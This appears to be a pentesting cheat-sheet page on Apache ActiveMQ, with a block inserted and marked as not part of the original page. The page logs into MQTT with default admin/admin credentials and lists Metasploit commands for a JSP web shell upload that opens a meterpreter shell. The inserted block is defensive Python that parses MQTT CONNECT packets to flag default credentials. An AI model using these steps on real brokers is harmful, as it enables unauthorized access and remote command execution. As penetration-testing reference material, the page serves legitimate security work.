Apache ActiveMQ Pentesting
Last modified: 2023-02-23
Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.
Interaction with MQTT
If the MQTT server is running on the target system, we can subscribe or publish to a topic in ActiveMQ using an MQTT client.
Subscribe to a Topic
# -h: Host
# -t: Topic name
# -V: MQTT protocol version (5, 31, 311)
mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31
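Seen from the broker side, the subscription above starts with an MQTT CONNECT packet that carries the user name and password in cleartext unless the listener is wrapped in TLS. The following added example (not part of the original page) parses a captured CONNECT packet, maps it to the -V values listed above and flags the admin/admin pair; the function names and the sample packet are constructed for illustration.

```python
import struct
DEFAULT_CREDS = {("admin", "admin")}  # assumption: the pair used in the command above
VERSIONS = {("MQIsdp", 3): "31", ("MQTT", 4): "311", ("MQTT", 5): "5"}  # -V values

def _varint(buf, pos):
    """Decode an MQTT variable-length integer; return (value, next_pos)."""
    value = 0
    for shift in (0, 7, 14, 21):
        value |= (buf[pos] & 0x7F) << shift
        pos += 1
        if buf[pos - 1] < 0x80:
            return value, pos
    raise ValueError("malformed variable-length integer")

def _field(buf, pos):
    """Read a 2-byte length-prefixed field; return (bytes, next_pos)."""
    end = pos + 2 + struct.unpack_from(">H", buf, pos)[0]
    if end > len(buf):
        raise ValueError("truncated field")
    return buf[pos + 2:end], end

def parse_connect(packet):
    """Parse one MQTT CONNECT packet; report version and cleartext credentials."""
    if not packet or packet[0] >> 4 != 1:
        raise ValueError("not an MQTT CONNECT packet")
    remaining, pos = _varint(packet, 1)
    body = packet[pos:pos + remaining]
    name, pos = _field(body, 0)
    level, flags, _keepalive = struct.unpack_from(">BBH", body, pos)
    pos += 4
    if level == 5:                            # MQTT 5: skip CONNECT properties
        size, pos = _varint(body, pos)
        pos += size
    _client_id, pos = _field(body, pos)
    if flags & 0x04:                          # will flag set: skip the will fields
        if level == 5:
            size, pos = _varint(body, pos)
            pos += size
        _topic, pos = _field(body, pos)
        _payload, pos = _field(body, pos)
    creds = []
    for bit in (0x80, 0x40):                  # user name flag, password flag
        raw, pos = _field(body, pos) if flags & bit else (None, pos)
        creds.append(None if raw is None else raw.decode("utf-8", "replace"))
    return {"version": VERSIONS.get((name.decode("latin-1"), level), "unknown"),
            "username": creds[0], "default_creds": tuple(creds) in DEFAULT_CREDS}

# Constructed sample: MQTT 3.1 CONNECT, client id "audit", user admin / password admin.
SAMPLE = b"\x10\x21\x00\x06MQIsdp\x03\xc2\x00\x3c\x00\x05audit\x00\x05admin\x00\x05admin"
```

Calling `parse_connect(SAMPLE)` reports version `31`, user name `admin` and `default_creds` set to true, which is the condition worth alerting on for a broker listener.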
Web Shell by File Upload JSP
ActiveMQ is vulnerable to web shell upload: an arbitrary JSP file can be uploaded to the server.
msfconsole
msf> use exploit/multi/http/apache_activemq_upload_jsp
msf> set ...
msf> run
meterpreter> shell